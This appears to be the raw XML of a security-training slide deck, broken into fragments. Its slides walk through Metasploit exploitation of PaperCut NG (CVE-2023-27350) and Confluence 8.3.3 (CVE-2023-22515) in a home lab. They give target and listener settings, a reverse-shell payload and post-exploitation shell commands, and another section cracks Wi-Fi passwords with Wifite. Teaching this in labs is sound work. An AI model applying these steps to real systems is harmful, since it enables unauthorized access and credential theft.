        <a:ext cx="2147627" cy="12885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A9E87-56AE-A247-8E52-A733952DB551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653EF-FD1C-FC49-B87F-861FE4B17E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86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653EF-FD1C-FC49-B87F-861FE4B17EC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95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653EF-FD1C-FC49-B87F-861FE4B17EC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9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67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16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26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68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05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787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4/24/25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35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4/24/25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07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4/24/25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33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29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3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494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1" r:id="rId2"/>
    <p:sldLayoutId id="2147483810" r:id="rId3"/>
    <p:sldLayoutId id="2147483809" r:id="rId4"/>
    <p:sldLayoutId id="2147483808" r:id="rId5"/>
    <p:sldLayoutId id="2147483801" r:id="rId6"/>
    <p:sldLayoutId id="2147483807" r:id="rId7"/>
    <p:sldLayoutId id="2147483806" r:id="rId8"/>
    <p:sldLayoutId id="2147483805" r:id="rId9"/>
    <p:sldLayoutId id="2147483804" r:id="rId10"/>
    <p:sldLayoutId id="214748380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6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9.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors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9.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors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D8AB6B-3D0E-86EF-846D-751BD5190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4552" y="871758"/>
            <a:ext cx="5825448" cy="38711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b="1" dirty="0"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>PaperCut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> NG CVE-2023-27350 Using Metasploit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F19D72-01BB-26A7-0486-E16D8509B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9964" y="4785543"/>
            <a:ext cx="5322013" cy="10056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1900" b="1"/>
              <a:t>Objective:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900"/>
              <a:t> Gain remote shell access by exploiting an unauthenticated authentication bypass vulnerability in PaperCut NG using Metasploit. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900"/>
          </a:p>
        </p:txBody>
      </p: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692522EB-361D-1698-374D-DE777B4883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268" r="30733"/>
          <a:stretch/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ack background with grey letters&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D85446F8-7F33-075C-8113-EE3540A06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907" y="5986242"/>
            <a:ext cx="2563092" cy="78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4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97794-B123-0DC4-3CE6-BA697247D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0" y="786385"/>
            <a:ext cx="5195889" cy="1316736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Post-Exploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:b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FAEE0B8-E5B3-BB06-ECA0-FAFB3A438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08" y="1636777"/>
            <a:ext cx="5587936" cy="490330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IN" sz="1600" dirty="0"/>
              <a:t>Post-exploitation refers to the actions you take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>after successfully compromising a system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>. The goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>gather information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>maintain access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>, and possibly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>pivot deeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t> into the network.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C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>whoami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pc-server\admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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C:\&gt; ipconfig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&lt;shows IP details&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>dir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&lt;lists </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PaperCut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> installation files&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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600" dirty="0"/>
              <a:t>C:\&gt; cd \Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PaperCut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> NG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&lt;goes into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>PaperCut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> directory&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A person wearing headphones and standing in front of a computer screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD4A930-2531-4CAF-D51D-E5864A9EC9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094" r="25780"/>
          <a:stretch/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1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7600B1-C9A0-6C3D-0067-FC93DF78E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44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3BA12-B2C2-4CF5-7785-40F5CB8C4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9CF8F-C73D-60A6-146C-42A1265F1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4552" y="871758"/>
            <a:ext cx="5825448" cy="38711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b="1" dirty="0"/>
              <a:t>Exploit Atlassian Confluence 8.3.3 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVE-2023-22515</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN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694483-DA34-73CB-466B-847C13F38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6800" y="4202573"/>
            <a:ext cx="6580909" cy="135309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IN" sz="1900" b="1" dirty="0" err="1"/>
              <a:t>Objective:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Gain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t> remote shell access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> by exploiting an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>unauthenticated authentication bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>remote code execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Atlassian Confluence (CVE-2023-22515)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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78EE3701-4750-52E1-5162-F633369283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268" r="30733"/>
          <a:stretch/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A1C03E-0050-B2D2-5F0C-8F8C81A24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5403273"/>
            <a:ext cx="7315199" cy="145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5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8DE68E6-767F-002E-C32F-9E2A96B2D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854"/>
            <a:ext cx="4987635" cy="3081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12D083-1040-D238-EB10-3EC4D501CD34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306291" y="775854"/>
            <a:ext cx="573578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sz="1600" b="1" dirty="0"/>
              <a:t>✅ Confluence Setup (TL;DR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>PostgreSQL Installed (v17)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Fixed password + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1"/>
              <a:t>pg_hba.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Port: 5432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Installed Confluence (8.3.3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Access via: http://localhost:8090</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>DB Configured</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>DB: confluence, User: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1"/>
              <a:t>confluenceuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>, UTF8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Fixed auth/connection issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>User Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Chose: Internal (not LDAP/Jira)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Admin Setup</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Username: admin, Email: nagu200418@gmail.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Fixed username/password errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Finished Setup Wizard</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Resolved system error (Jira sync issue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Logged In</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>http://localhost:8090 as admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Created Space</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>✅ Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1"/>
              <a:t>DevOPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t> Doc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45478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2A8657-6C4C-17AB-FB49-AA4ED0EF6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0660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="12192001" cy="7232073"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4152104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68C9F6-8446-C229-EC1D-502E3ED801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091" b="10306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48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28193-E52F-132A-2B27-704DD824F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4AFA-958A-172C-EAFF-E3FFD5020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Open Metasploit Framework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960F4-8718-9EF1-D64E-6EE250EF8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21992"/>
            <a:ext cx="5064061" cy="3739896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Launch Metasploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="ACADEMY ENGRAVED LET PLAIN:1.0" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="ACADEMY ENGRAVED LET PLAIN:1.0" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="ACADEMY ENGRAVED LET PLAIN:1.0" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2237904A-0155-ED26-E6C0-AE58B97A5185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3684106" y="1683026"/>
          <a:ext cx="8150086" cy="4797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3204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78C35-710D-F035-F64A-056E1DAA3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DFEB-6FDE-A7F0-E3B8-0649724C2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399"/>
            <a:ext cx="5239272" cy="16211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3700" b="1" dirty="0"/>
              <a:t>Load the Exploit Module</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3700" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3700" dirty="0"/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A95BFBDF-B449-C271-1A5D-D549DCEAB6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1767858"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6346175" y="914399"/>
          <a:ext cx="572864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FF6005B-FB75-ED15-6669-955BD5C0A7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879529"/>
            <a:ext cx="6234545" cy="144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88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6111C-EF89-4314-69D8-68A0CF320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4. Configure the Target &amp; Listener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F045B-AC5E-AC10-659C-0E4A589C9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RHOST 192.168.3.104</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set RPORT 8090</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set LHOST 192.168.3.103</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set SSL false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ForceExploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> true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DDDDC-E469-4BF9-7A5D-B7817245D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527" y="4636009"/>
            <a:ext cx="8146473" cy="144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55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07DD3-53CF-3C26-9B5F-B3BF25C8C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8F341-22EE-E3BB-B895-1CBD60211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001512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b="1"/>
              <a:t> Launch the Exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Unlock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43148A59-F46E-B9C5-622F-1520188B1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4560" y="1951854"/>
            <a:ext cx="4202057" cy="4202057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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EB9F63C6-A633-F6CC-9BD2-2E94841C2E8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4088" y="2231136"/>
          <a:ext cx="6001512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94524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9C0E6AB-EAB6-41E0-9D49-369643E87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176A7A0-FAD0-4BFC-A0FC-6B091D842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791C4B7-97DA-0342-69AE-C94544E3FF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78" r="4674"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-180956" y="0"/>
            <a:ext cx="12372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47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BC4354-1B99-E702-3294-2D86D22F8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74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B7C844-99ED-5B1A-27BD-521F6CC59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79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B05F5-495A-26A6-80A0-99777F72E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Wifite Tool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Wi-Fi">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486A1E83-2113-5650-FD1D-F173BBDBC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0149" y="723901"/>
            <a:ext cx="54102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25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ADD27CF-4CE1-2871-1ABA-40FCA4D03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538488" y="723900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42F9B3-8546-01F3-0A52-F913D98E3B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7974469"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3987800" y="723900"/>
          <a:ext cx="7442201" cy="5400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4586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F5F08-5551-8360-1241-C64699E15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7AA95-931A-3B31-06AF-18FAB3BF6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87A1704-8B65-08F8-DE59-29000E5D0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85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65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DD710A-36F1-D22F-8EF5-A2720CD20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" t="-468" r="206" b="38697"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-20894"/>
            <a:ext cx="12203620" cy="2764304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76800" y="4114590"/>
            <a:ext cx="9818" cy="2019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3DEAE-29CC-BAB8-4ADB-51958A208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0933" y="4088705"/>
            <a:ext cx="6135924" cy="209397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b="1"/>
              <a:t>Step 3:Attack on wifi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>After the scan, it shows some available wifi’s.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Press Ctrl + C to exit scan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Enter the sl. No. The WiFi you choose.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Example 1. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>After some time, it shows the cracked password and handshake as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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4031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7EC16-37AF-4CAA-DCB4-E5C4AF47B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CBC39-5E88-E3EF-9162-4361D698AD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A screen shot of a computer program">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71E86AB-A44C-5199-6405-73C66C84E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" b="10851"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="21" y="0"/>
            <a:ext cx="12191979" cy="685798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9709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5C99F-EE08-266A-3CC9-FCE39F57D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 dirty="0"/>
              <a:t>Open Metasploit Framework</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN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72EDA-D6D4-78F2-7002-D408D215B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21992"/>
            <a:ext cx="5064061" cy="3739896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Launch Metasploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="ACADEMY ENGRAVED LET PLAIN:1.0" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="ACADEMY ENGRAVED LET PLAIN:1.0" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="ACADEMY ENGRAVED LET PLAIN:1.0" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168B87FE-1EC9-9A87-3739-04C2EDF08E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1779857"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3684106" y="1683026"/>
          <a:ext cx="8150086" cy="4797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2729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73E57A-280E-E267-296D-8ED1D635A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017" y="0"/>
            <a:ext cx="12241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37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FB2B75-80CA-C2B2-34A9-E72FA2F50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399"/>
            <a:ext cx="5239272" cy="162114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3700" b="1"/>
              <a:t>Load the Exploit Module</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3700" b="1"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3DF08D-8EDA-0FB3-59D9-B692F2ADD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0FFEE9F-1BBF-7063-FE0C-DF08A18D7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67568"/>
            <a:ext cx="5728650" cy="886443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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F130F95B-6626-3BBA-845A-467A093BA3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5376865"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6346175" y="914399"/>
          <a:ext cx="5728649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612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229317-574C-5B30-61A4-D4FB9DD72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7"/>
            <a:ext cx="6283419" cy="1316736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1"/>
              <a:t>Set  the Payload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" b="1"/>
            </a:br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AEDDB4C-6582-43D5-AF25-99F4AD3A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DC2669B-2125-1A46-FB71-1ACA6C530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7" y="2226373"/>
            <a:ext cx="6283419" cy="372199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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1"/>
              <a:t>Setting PAYLOAD: java/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" b="1" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1400"/>
              <a:t>In Metasploit, after selecting an exploit (like exploit/multi/http/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" err="1"/>
